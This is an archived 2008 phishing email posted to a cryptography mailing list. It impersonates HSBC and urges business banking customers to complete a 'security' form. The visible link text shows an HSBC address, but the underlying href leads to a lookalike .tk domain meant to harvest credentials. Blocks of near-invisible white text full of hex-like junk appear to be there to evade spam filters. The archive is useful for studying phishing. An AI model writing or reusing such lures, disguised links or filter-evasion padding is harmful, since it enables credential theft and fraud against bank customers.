[119592] in cryptography@c2.net mail archive
HSBC bank: security measures.
daemon@ATHENA.MIT.EDU (HSBC)
Fri Apr 4 15:40:58 2008
From: "HSBC" <autoremailer.id6640-84447420bib@hsbc.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----K49l6nur16yg9LZ
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<p>Dear HSBC bank customer,</p>
<p>We would like to inform you that we are currently carrying out scheduled maintenance.<br>
In order to guarantee the high level of security to our business customers, we require you to complete “HSBC Business Internet Banking Form”.<br>
Please complete HSBC BIB Form using the link below:</p>
<p><font face="Verdana, Arial, Helvetica, sans-serif"><a href="http://business.hsbc.com.jfyyfg.tk/sys_directory/isa/file.aspx?session=650603582100052071381723362127926454848640136422&id=047843418294767">http://business.hsbc.com/sys_directory/isa/file.aspx?session=650603582100052071381723362127926454848640136422&id=047843418294767</a></font></p>
<p>This is auto-generated email, please do not respond to this email.<font face="Verdana, Arial, Helvetica, sans-serif"><br>
</font></p>
<p><font color="#FFFFF0" face="Verdana, Arial, Helvetica, sans-serif">0x09, 0x20657292, 0x5939, 0x62578879, 0x3, 0x93822719, 0x91271008 UBK, 5PG, function, YH4, K692 0x11, 0x166, 0x11, 0x5, 0x92, 0x0, 0x5, 0x223, 0x528, 0x5, 0x3, 0x5740, 0x18032724 85796878590497041549443658250442791 0x82, 0x678, 0x900, 0x3437 common: 0x11, 0x73681754, 0x866, 0x73, 0x64172010, 0x58287233, 0x2, 0x55777098, 0x17, 0x13112089, 0x5 0x86747624, 0x1, 0x93813129, 0x8, 0x0336, 0x700, 0x338, 0x8, 0x4, 0x11978332, 0x702, 0x51 0x210, 0x1, 0x1604, 0x1, 0x9109 0x3, 0x6, 0x0, 0x55, 0x29822130, 0x094, 0x27438152, 0x249, 0x64910973, 0x2714, 0x685, 0x630, 0x261, 0x8863, 0x858 0x90454846</font></p>
<p><font color="#FFFFFC" face="Verdana, Arial, Helvetica, sans-serif">media: 0x08, 0x0, 0x4725, 0x3, 0x58788502, 0x024, 0x36, 0x1575 source: 0x47, 0x69925209, 0x9, 0x99, 0x6, 0x784, 0x62, 0x1872, 0x6, 0x08, 0x50470915 0x88, 0x50, 0x34207213, 0x846, 0x3, 0x7132, 0x69, 0x52, 0x860, 0x45974391, 0x61366363 ND7, 0A3, NGGX, hex, 3I4, FWT8 Q2A: 0x451, 0x555 43208190690530202974401865287 0x5, 0x7967, 0x43, 0x4, 0x51 hex media root KG9 7PNM serv define R6A create. 0x2293, 0x80859096, 0x96, 0x665, 0x5569, 0x66, 0x63696034, 0x3364, 0x8329, 0x35, 0x8, 0x69840664, 0x508, 0x9442 0x0385, 0x19, 0x9, 0x97251600, 0x36887815, 0x54749456, 0x5 0x408, 0x860, 0x008, 0x596, 0x81572008, 0x72374889, 0x21346755, 0x34146873, 0x3908, 0x815, 0x543, 0x73, 0x25513583, 0x23</font></p>
<p><font color="#FFFFFD" face="Verdana, Arial, Helvetica, sans-serif">include: 0x5375, 0x4107, 0x5, 0x46155713, 0x8, 0x6, 0x9, 0x23, 0x31, 0x0494, 0x4444, 0x5 0x560, 0x5, 0x484, 0x215, 0x6, 0x34, 0x5, 0x18, 0x11656538, 0x325, 0x6, 0x337, 0x10 0x61, 0x03555061, 0x646, 0x926, 0x9, 0x95182650, 0x83192517, 0x45, 0x956 0x2712, 0x89, 0x6, 0x04, 0x019, 0x665, 0x279 source, root, Z62V close: 0x46442772, 0x89969230, 0x5453, 0x8560, 0x69995835, 0x42873698, 0x2055, 0x21, 0x4330, 0x0, 0x96, 0x07, 0x2250 serv: 0x1, 0x24, 0x640, 0x688, 0x818, 0x87, 0x86423291, 0x02466511, 0x69, 0x1, 0x2 0x31, 0x5719, 0x70, 0x20, 0x06148876, 0x868, 0x19693629, 0x7 SRT TCGC create cvs CEYX. 0x23, 0x00, 0x5, 0x99600467, 0x32592478, 0x2934, 0x37</font> <font color="#FFFFFE" face="Verdana, Arial, Helvetica, sans-serif">89548582373223827652769400481970</font></p>
<p><font color="#FFFFF7" face="Verdana, Arial, Helvetica, sans-serif">43285218160263469079</font> <font color="#FFFFF4" face="Verdana, Arial, Helvetica, sans-serif">0x610, 0x9213, 0x37, 0x4, 0x2, 0x94932417 hex: 0x40, 0x7, 0x4, 0x34, 0x75 FJP: 0x315, 0x103, 0x15, 0x68, 0x5700, 0x35110625, 0x297, 0x4, 0x07, 0x8512</font></p>
</body>
</html>
----K49l6nur16yg9LZ--